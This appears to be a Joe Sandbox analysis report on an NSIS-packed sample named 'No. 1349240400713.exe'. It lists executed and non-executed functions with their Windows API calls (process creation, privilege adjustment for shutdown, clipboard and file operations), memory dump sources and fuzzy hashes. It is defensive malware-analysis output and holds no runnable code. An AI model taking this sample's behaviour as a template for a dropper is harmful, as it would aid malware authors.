                                                                • CreateDialogParamW.USER32(0000006F,00000000,00402F2B,00000000), ref: 00402FFF
                                                                • ShowWindow.USER32(00000000,00000005,?,00000007,00000009,0000000B), ref: 0040300D
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1606783703.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1606769972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606798240.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606920867.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_No.jbxd
                                                                Similarity
                                                                • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                • String ID:
                                                                • API String ID: 2102729457-0
                                                                • Opcode ID: e942aba91c3d4d0b77748caef32317d1a3e8dc78421a0242562119172c6ce506
                                                                • Instruction ID: d33bc14a5fcc1787285ca97da28f022d839d2e13e88132ee71d9f244d0d7cdfd
                                                                • Opcode Fuzzy Hash: e942aba91c3d4d0b77748caef32317d1a3e8dc78421a0242562119172c6ce506
                                                                • Instruction Fuzzy Hash: 4AF05E3160AA21ABC6216F10FF0DA8B7B64BB48B41741487AF842B15E9DB740CA1DB9D
                                                                Function 004059FA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,Error launching installer), ref: 00405A23
                                                                • CloseHandle.KERNEL32(?), ref: 00405A30
                                                                Strings
                                                                • Error launching installer, xrefs: 00405A0D
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1606783703.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1606769972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606798240.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606920867.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_No.jbxd
                                                                Similarity
                                                                • API ID: CloseCreateHandleProcess
                                                                • String ID: Error launching installer
                                                                • API String ID: 3712363035-66219284
                                                                • Opcode ID: 4cad7792158b69fc064c933527736888f22fedd2346a68a48c9e5725d4d2403f
                                                                • Instruction ID: 9b609aa4dbda1b40da6c9694c56aee9f908f129f2491f8ac19b90d9f5f8e4f4b
                                                                • Opcode Fuzzy Hash: 4cad7792158b69fc064c933527736888f22fedd2346a68a48c9e5725d4d2403f
                                                                • Instruction Fuzzy Hash: 19E0B6B4600209BFEB109FA4EE49F7B7AACEB04708F004565BD50F6191DBB8EC158A7C
                                                                Function 00403A4B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • FreeLibrary.KERNEL32(?,771B3420,00000000,C:\Users\user~1\AppData\Local\Temp\,00403A23,00403839,00000007,?,00000007,00000009,0000000B), ref: 00403A65
                                                                • GlobalFree.KERNEL32(?), ref: 00403A6C
                                                                Strings
                                                                • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00403A4B
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1606783703.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1606769972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606798240.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606920867.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_No.jbxd
                                                                Similarity
                                                                • API ID: Free$GlobalLibrary
                                                                • String ID: C:\Users\user~1\AppData\Local\Temp\
                                                                • API String ID: 1100898210-2382934351
                                                                • Opcode ID: 14d9b0f9b7ecca22f0083886da8930ddd6c03ed0d6fdc94ff3a28603f1b7b4ab
                                                                • Instruction ID: 631b6d606f958dd3b9f901d17eba749f6bbdc97bd5f3e27fdad90cb16f3fbd8e
                                                                • Opcode Fuzzy Hash: 14d9b0f9b7ecca22f0083886da8930ddd6c03ed0d6fdc94ff3a28603f1b7b4ab
                                                                • Instruction Fuzzy Hash: 1CE0EC3261212097C7219F55BE08B6E7768AF48B22F06146AE9C5BB2608B745D424FD8
                                                                Function 00405D32 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • lstrlenW.KERNEL32(?,C:\Users\user\Desktop,00403081,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\No. 1349240400713.exe,C:\Users\user\Desktop\No. 1349240400713.exe,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405D38
                                                                • CharPrevW.USER32(?,00000000,?,C:\Users\user\Desktop,00403081,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\No. 1349240400713.exe,C:\Users\user\Desktop\No. 1349240400713.exe,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405D48
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1606783703.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1606769972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606798240.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606920867.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_No.jbxd
                                                                Similarity
                                                                • API ID: CharPrevlstrlen
                                                                • String ID: C:\Users\user\Desktop
                                                                • API String ID: 2709904686-3976562730
                                                                • Opcode ID: ca28fb495e832aca3bc5bc38fa8d5a1d536c38e2997e226eadf599fe90d3b243
                                                                • Instruction ID: cdcea1fdb6b733c318131938d2018cbcd3f5257763d90021158e822df2c29c6c
                                                                • Opcode Fuzzy Hash: ca28fb495e832aca3bc5bc38fa8d5a1d536c38e2997e226eadf599fe90d3b243
                                                                • Instruction Fuzzy Hash: FCD05EB24009209AC3126704DC0999F67A8FF5130078A842BF541AA1A4D7785C818AAC
                                                                Function 6EDF10E1 Relevance: 5.1, APIs: 4, Instructions: 104memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 6EDF116A
                                                                • GlobalFree.KERNEL32(00000000), ref: 6EDF11C7
                                                                • GlobalFree.KERNEL32(00000000), ref: 6EDF11D9
                                                                • GlobalFree.KERNEL32(?), ref: 6EDF1203
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1649696285.000000006EDF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6EDF0000, based on PE: true
                                                                • Associated: 00000000.00000002.1649673053.000000006EDF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000000.00000002.1649710611.000000006EDF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000000.00000002.1649724182.000000006EDF6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6edf0000_No.jbxd
                                                                Similarity
                                                                • API ID: Global$Free$Alloc
                                                                • String ID:
                                                                • API String ID: 1780285237-0
                                                                • Opcode ID: 417a968fdeadcd8f977eac89efb5f90c1a5009f10750511815f058dc50a86ff3
                                                                • Instruction ID: 96f3b562f2dcd8a44b6ada3f29f515101c420d54717f9d3e9c9c1a4dd7c45a8d
                                                                • Opcode Fuzzy Hash: 417a968fdeadcd8f977eac89efb5f90c1a5009f10750511815f058dc50a86ff3
                                                                • Instruction Fuzzy Hash: CB31A4F2900602DFEB00CFE9E955A657BE8EB46314B024519E845D7292E734DD4BC760
                                                                Function 00405E6C Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406151,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7C
                                                                • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405E94
                                                                • CharNextA.USER32(00000000,?,00000000,00406151,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405EA5
                                                                • lstrlenA.KERNEL32(00000000,?,00000000,00406151,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405EAE
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1606783703.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1606769972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606798240.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606920867.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_No.jbxd
                                                                Similarity
                                                                • API ID: lstrlen$CharNextlstrcmpi
                                                                • String ID:
                                                                • API String ID: 190613189-0
                                                                • Opcode ID: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                                                • Instruction ID: 346f7042b660fb70b52ae74c1c6e121eab6bc84344666f805f11c7930e864ff2
                                                                • Opcode Fuzzy Hash: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                                                • Instruction Fuzzy Hash: A8F06231505418FFD7029BA5DE0099FBBA8EF56250B2540AAE880F7250D674EF019BA9

                                                                Non-executed Functions

                                                                Function 004034C5 Relevance: 73.9, APIs: 32, Strings: 10, Instructions: 410stringfilecomCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SetErrorMode.KERNEL32 ref: 004034E8
                                                                • GetVersion.KERNEL32 ref: 004034EE
                                                                • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403521
                                                                • #17.COMCTL32(?,00000007,00000009,0000000B), ref: 0040355E
                                                                • OleInitialize.OLE32(00000000), ref: 00403565
                                                                • SHGetFileInfoW.SHELL32(0042B228,00000000,?,000002B4,00000000), ref: 00403581
                                                                • GetCommandLineW.KERNEL32(00433F00,NSIS Error,?,00000007,00000009,0000000B), ref: 00403596
                                                                • CharNextW.USER32(00000000,00440000,00000020,00440000,00000000,?,00000007,00000009,0000000B), ref: 004035CE
                                                                  • Part of subcall function 00406806: GetModuleHandleA.KERNEL32(?,00000020,?,00403537,0000000B), ref: 00406818
                                                                  • Part of subcall function 00406806: GetProcAddress.KERNEL32(00000000,?), ref: 00406833
                                                                • GetTempPathW.KERNEL32(00000400,00442800,?,00000007,00000009,0000000B), ref: 00403708
                                                                • GetWindowsDirectoryW.KERNEL32(00442800,000003FB,?,00000007,00000009,0000000B), ref: 00403719
                                                                • lstrcatW.KERNEL32(00442800,\Temp,?,00000007,00000009,0000000B), ref: 00403725
                                                                • GetTempPathW.KERNEL32(000003FC,00442800,00442800,\Temp,?,00000007,00000009,0000000B), ref: 00403739
                                                                • lstrcatW.KERNEL32(00442800,Low,?,00000007,00000009,0000000B), ref: 00403741
                                                                • SetEnvironmentVariableW.KERNEL32(TEMP,00442800,00442800,Low,?,00000007,00000009,0000000B), ref: 00403752
                                                                • SetEnvironmentVariableW.KERNEL32(TMP,00442800,?,00000007,00000009,0000000B), ref: 0040375A
                                                                • DeleteFileW.KERNEL32(00442000,?,00000007,00000009,0000000B), ref: 0040376E
                                                                  • Part of subcall function 00406411: lstrcpynW.KERNEL32(?,?,00000400,00403596,00433F00,NSIS Error,?,00000007,00000009,0000000B), ref: 0040641E
                                                                • OleUninitialize.OLE32(00000007,?,00000007,00000009,0000000B), ref: 00403839
                                                                • ExitProcess.KERNEL32 ref: 0040385A
                                                                • lstrcatW.KERNEL32(00442800,~nsu,00440000,00000000,00000007,?,00000007,00000009,0000000B), ref: 0040386D
                                                                • lstrcatW.KERNEL32(00442800,0040A26C,00442800,~nsu,00440000,00000000,00000007,?,00000007,00000009,0000000B), ref: 0040387C
                                                                • lstrcatW.KERNEL32(00442800,.tmp,00442800,~nsu,00440000,00000000,00000007,?,00000007,00000009,0000000B), ref: 00403887
                                                                • lstrcmpiW.KERNEL32(00442800,00441800,00442800,.tmp,00442800,~nsu,00440000,00000000,00000007,?,00000007,00000009,0000000B), ref: 00403893
                                                                • SetCurrentDirectoryW.KERNEL32(00442800,00442800,?,00000007,00000009,0000000B), ref: 004038AF
                                                                • DeleteFileW.KERNEL32(0042AA28,0042AA28,?,00436000,00000009,?,00000007,00000009,0000000B), ref: 00403909
                                                                • CopyFileW.KERNEL32(00443800,0042AA28,00000001,?,00000007,00000009,0000000B), ref: 0040391D
                                                                • CloseHandle.KERNEL32(00000000,0042AA28,0042AA28,?,0042AA28,00000000,?,00000007,00000009,0000000B), ref: 0040394A
                                                                • GetCurrentProcess.KERNEL32(00000028,0000000B,00000007,00000009,0000000B), ref: 00403979
                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 00403980
                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403995
                                                                • AdjustTokenPrivileges.ADVAPI32 ref: 004039B8
                                                                • ExitWindowsEx.USER32(00000002,80040002), ref: 004039DD
                                                                • ExitProcess.KERNEL32 ref: 00403A00
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1881165369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000009.00000002.1881145956.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000009.00000002.1881185536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000009.00000002.1881204163.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000009.00000002.1881233569.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_400000_No.jbxd
                                                                Similarity
                                                                • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                • String ID: .tmp$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                • API String ID: 3441113951-3195845224
                                                                • Opcode ID: f9aa3e48403101c5508bb2b69decf857036db8760d6c0613ee29b2d3e2fcc997
                                                                • Instruction ID: 633452ec6b1f102921f1489b21fe302f429ce1b90f1906ff0e0a9b5b291269fb
                                                                • Opcode Fuzzy Hash: f9aa3e48403101c5508bb2b69decf857036db8760d6c0613ee29b2d3e2fcc997
                                                                • Instruction Fuzzy Hash: 7DD12671600311ABE7207F659D45B3B3AACEB8070AF11443FF581B62D1DBBD89518B6E
                                                                Function 00405B23 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 148filestringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • DeleteFileW.KERNEL32(?,?,771B3420,00442800,00000000), ref: 00405B4C
                                                                • lstrcatW.KERNEL32(0042F270,\*.*,0042F270,?,?,771B3420,00442800,00000000), ref: 00405B94
                                                                • lstrcatW.KERNEL32(?,0040A014,?,0042F270,?,?,771B3420,00442800,00000000), ref: 00405BB7
                                                                • lstrlenW.KERNEL32(?,?,0040A014,?,0042F270,?,?,771B3420,00442800,00000000), ref: 00405BBD
                                                                • FindFirstFileW.KERNEL32(0042F270,?,?,?,0040A014,?,0042F270,?,?,771B3420,00442800,00000000), ref: 00405BCD
                                                                • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405C6D
                                                                • FindClose.KERNEL32(00000000), ref: 00405C7C
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1881165369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000009.00000002.1881145956.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000009.00000002.1881185536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000009.00000002.1881204163.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000009.00000002.1881233569.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_400000_No.jbxd
                                                                Similarity
                                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                • String ID: \*.*
                                                                • API String ID: 2035342205-1173974218
                                                                • Opcode ID: 912061dd7fb5ba2c7c1f5c86e30a25b85448f8851c49b70d5dd93a38a45adafc
                                                                • Instruction ID: 64ad53015563eb9bad7c636b6f780160dd5a6986b89d0419f795064a900c36f2
                                                                • Opcode Fuzzy Hash: 912061dd7fb5ba2c7c1f5c86e30a25b85448f8851c49b70d5dd93a38a45adafc
                                                                • Instruction Fuzzy Hash: 8941B330804B18AAEB21AB658D89AAF7778EF41714F24417FF802B11D1D77C5E81DE6E
                                                                Function 004055B8 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284windowclipboardmemoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetDlgItem.USER32(?,00000403), ref: 00405616
                                                                • GetDlgItem.USER32(?,000003EE), ref: 00405625
                                                                • GetClientRect.USER32(?,?), ref: 00405662
                                                                • GetSystemMetrics.USER32(00000002), ref: 00405669
                                                                • SendMessageW.USER32(?,00001061,00000000,?), ref: 0040568A
                                                                • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 0040569B
                                                                • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004056AE
                                                                • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004056BC
                                                                • SendMessageW.USER32(?,00001024,00000000,?), ref: 004056CF
                                                                • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004056F1
                                                                • ShowWindow.USER32(?,00000008), ref: 00405705
                                                                • GetDlgItem.USER32(?,000003EC), ref: 00405726
                                                                • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405736
                                                                • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040574F
                                                                • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040575B
                                                                • GetDlgItem.USER32(?,000003F8), ref: 00405634
                                                                  • Part of subcall function 0040439C: SendMessageW.USER32(00000028,?,00000001,004041C7), ref: 004043AA
                                                                • GetDlgItem.USER32(?,000003EC), ref: 00405778
                                                                • CreateThread.KERNEL32(00000000,00000000,Function_0000554C,00000000), ref: 00405786
                                                                • CloseHandle.KERNEL32(00000000), ref: 0040578D
                                                                • ShowWindow.USER32(00000000), ref: 004057B1
                                                                • ShowWindow.USER32(?,00000008), ref: 004057B6
                                                                • ShowWindow.USER32(00000008), ref: 00405800
                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405834
                                                                • CreatePopupMenu.USER32 ref: 00405845
                                                                • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405859
                                                                • GetWindowRect.USER32(?,?), ref: 00405879
                                                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405892
                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058CA
                                                                • OpenClipboard.USER32(00000000), ref: 004058DA
                                                                • EmptyClipboard.USER32 ref: 004058E0
                                                                • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004058EC
                                                                • GlobalLock.KERNEL32(00000000), ref: 004058F6
                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040590A
                                                                • GlobalUnlock.KERNEL32(00000000), ref: 0040592A
                                                                • SetClipboardData.USER32(0000000D,00000000), ref: 00405935
                                                                • CloseClipboard.USER32 ref: 0040593B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1881165369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000009.00000002.1881145956.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000009.00000002.1881185536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000009.00000002.1881204163.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000009.00000002.1881233569.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_400000_No.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                • String ID: {
                                                                • API String ID: 590372296-366298937
                                                                • Opcode ID: a6eb79d94d5585e354ce7f5624a0be2435d33a16d5952c6d8794959a9532ce52
                                                                • Instruction ID: ef42e6e7ad26681d1de71b6013131fdd69d98400fc0f56e042e978cac442fd71
                                                                • Opcode Fuzzy Hash: a6eb79d94d5585e354ce7f5624a0be2435d33a16d5952c6d8794959a9532ce52
                                                                • Instruction Fuzzy Hash: 45B138B1900608FFDB11AFA0DE85AAE7B79FB44355F00803AFA41B61A0CB755E51DF68
                                                                Function 00404DD4 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 490windowmemoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetDlgItem.USER32(?,000003F9), ref: 00404DEB
                                                                • GetDlgItem.USER32(?,00000408), ref: 00404DF8
                                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 00404E44
                                                                • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404E5B
                                                                • SetWindowLongW.USER32(?,000000FC,004053ED), ref: 00404E75
                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404E89
                                                                • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404E9D
                                                                • SendMessageW.USER32(?,00001109,00000002), ref: 00404EB2
                                                                • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404EBE
                                                                • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404ED0
                                                                • DeleteObject.GDI32(00000110), ref: 00404ED5
                                                                • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404F00
                                                                • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404F0C
                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404FA7
                                                                • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404FD7
                                                                  • Part of subcall function 0040439C: SendMessageW.USER32(00000028,?,00000001,004041C7), ref: 004043AA
                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404FEB
                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00405019
                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00405027
                                                                • ShowWindow.USER32(?,00000005), ref: 00405037
                                                                • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405138
                                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040519A
                                                                • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004051AF
                                                                • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004051D3
                                                                • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004051F6
                                                                • ImageList_Destroy.COMCTL32(?), ref: 0040520B
                                                                • GlobalFree.KERNEL32(?), ref: 0040521B
                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405294
                                                                • SendMessageW.USER32(?,00001102,?,?), ref: 0040533D
                                                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040534C
                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 00405376
                                                                • ShowWindow.USER32(?,00000000), ref: 004053C4
                                                                • GetDlgItem.USER32(?,000003FE), ref: 004053CF
                                                                • ShowWindow.USER32(00000000), ref: 004053D6
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1881165369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000009.00000002.1881145956.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000009.00000002.1881185536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000009.00000002.1881204163.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000009.00000002.1881233569.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_400000_No.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                • String ID: $M$N
                                                                • API String ID: 2564846305-813528018
                                                                • Opcode ID: eda24d9e563f14e56c6da67046dad0d9d72a11225f231514b8bed0d83fcccfef
                                                                • Instruction ID: d580a4fcaa5169941c29ca465f5867fc490570c71858173d192e260bc12e7e27
